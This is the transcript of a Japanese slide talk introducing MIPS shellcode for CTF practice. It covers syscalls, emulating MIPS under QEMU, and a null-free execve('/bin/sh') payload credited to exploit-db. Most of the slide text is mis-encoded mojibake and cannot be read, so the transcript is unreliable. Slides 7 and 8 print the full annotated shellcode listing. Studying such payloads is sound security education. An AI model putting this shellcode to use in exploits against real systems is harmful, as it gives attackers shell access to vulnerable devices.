mipsシェルコード入門

Transcript

1. NJQTγΣϧίʔυೖ໳ $QBX-5!ίϫʔΩϯάεϖʔεכ৔ொ $P&EP ೥݄೔ ۚ https://speakerdeck.com/owlinux1000

2. എܠ • $5' $BQUVSF
   5IF
   'MBH Ͱ͸γΣϧΛ ୣऔ͢Δδϟϯϧ1XO &YQMPJU ͕͋Δ • ͍͍ͩͨͷ໰୊͕YΞʔΩςΫνϟ

   • ͨ·ʹଞͷΞʔΩςΫνϟͷ໰୊΋ͰΔ ˠ NJQTͷษڧΛͯ͠ΈΑ͏ 

3. എܠ • ໋ྩηοτɾΞʔΩςΫνϟ͸ҟͳΔ • Y্Ͱ͸ɺNJQTͷ࣮ߦϑΝΠϧ͸ಈ͔ͳ͍ ˠ Ծ૝తʹΤϛϡϨʔτ͢Δඞཁ͕͋Δ  mov eax,

   0x0 move v0, zero x86 mips

4. 2FNVʹΑΔ؀ڥ࡞੒ • ຊ࣭Ͱ͸ͳ͍ͷͰׂѪ • #VJMEJOH
   B
   %FCJBO 4USFUDI
   2&.6
   JNBHF
   GPS
   .*14FM<>͕Θ͔Γ΍͍͢  [1] https://blahcat.github.io/2017/07/14/building-a-debian-stretch-qemu-image-for-mipsel/

   [2] https://ja.wikipedia.org/wiki/QEMU#/media/File:Qemu_logo.svg [2]

5. γΣϧίʔυ • ޿ٛͷҙຯͰ͸ɺ߈ܸ༻ͷίʔυͷஅย • $5'Ͱ͸ FYFDWF lCJOTIz
   /6--
   /6-- 

   Λ͢ΔίʔυΛΛࢦ͢ࣄ͕ଟ͍ • ΞηϯϒϦݴޠͰ͸ɺγεςϜίʔϧΛ ݺͿඞཁ͕͋Δ 

6. γεςϜίʔϧ • Χʔωϧ͕࣋ͭػೳΛݺͼग़͢ࡍʹར༻ • WϨδελʹγεςϜίʔϧ൪߸ • ྫ
   ͸PQFO ϑΝΠϧΛ։͘ •

   BϨδελʹୈҰҾ਺ɾɾɾ • ্هΛઃఆޙɺTZTDBMM໋ྩΛݺͿ  https://w3challs.com/syscalls/?arch=mips_o32

7. NJQTͷγΣϧίʔυ<> ΞυϨε ΞηϯϒϦ ίϝϯτ 0x1000 slti $a2, $zero, -1 $a2

   <- 0 0x1004 bltzal $a2, 0x1004 $ra <- 次の命令のアドレス(0x100c) 0x1008 slti $a1, $zero, -1 $a1 <- 0 0x100c addu $a0, $ra, 4097 $a0 <- $ra + 4097 0x1010 addu $a0, $a0, -4081 $a0 <- $a0 – 4081 ($a0 = $ra + 16) 0x1014 li $v0, 4011 $v0 = 4011 (execveの番号) 0x1018 syscall 0x40404 システムコールを呼ぶ 0x101c .string "/bin/sh"  [3] https://www.exploit-db.com/exploits/35868/

8. NJQTͷγΣϧίʔυ<> ΞυϨε ΞηϯϒϦ ίϝϯτ 0x1000 slti $a2, $zero, -1 $a2

   <- 0 0x1004 bltzal $a2, 0x1004 $ra <- 次の命令のアドレス(0x100c) 0x1008 slti $a1, $zero, -1 $a1 <- 0 0x100c addu $a0, $ra, 4097 $a0 <- $ra + 4097 0x1010 addu $a0, $a0, -4081 $a0 <- $a0 – 4081 ($a0 = $ra + 16) 0x1014 li $v0, 4011 $v0 = 4011 (execveの番号) 0x1018 syscall 0x40404 システムコールを呼ぶ 0x101c .string "/bin/sh"  [3] https://www.exploit-db.com/exploits/35868/ ※機械語に変換した時に”\x00”が⼊らないようなプログラムを意図的に作っている → str(n)cpyなどの関数を使っている場合、”\x00”があるとそこで途切れる

9. ࣮ߦ݁Ռ 

10. ͓ΘΓ • NJQTͷγΣϧίʔυͷ࢓૊ΈΛֶΜͩ • ڵຯ͕ग़ͨਓ͸ͥͻಡΜͰΈͯԼ͍͞ 
    

11. એ఻  https://tokyowesterns.github.io/ctf2017/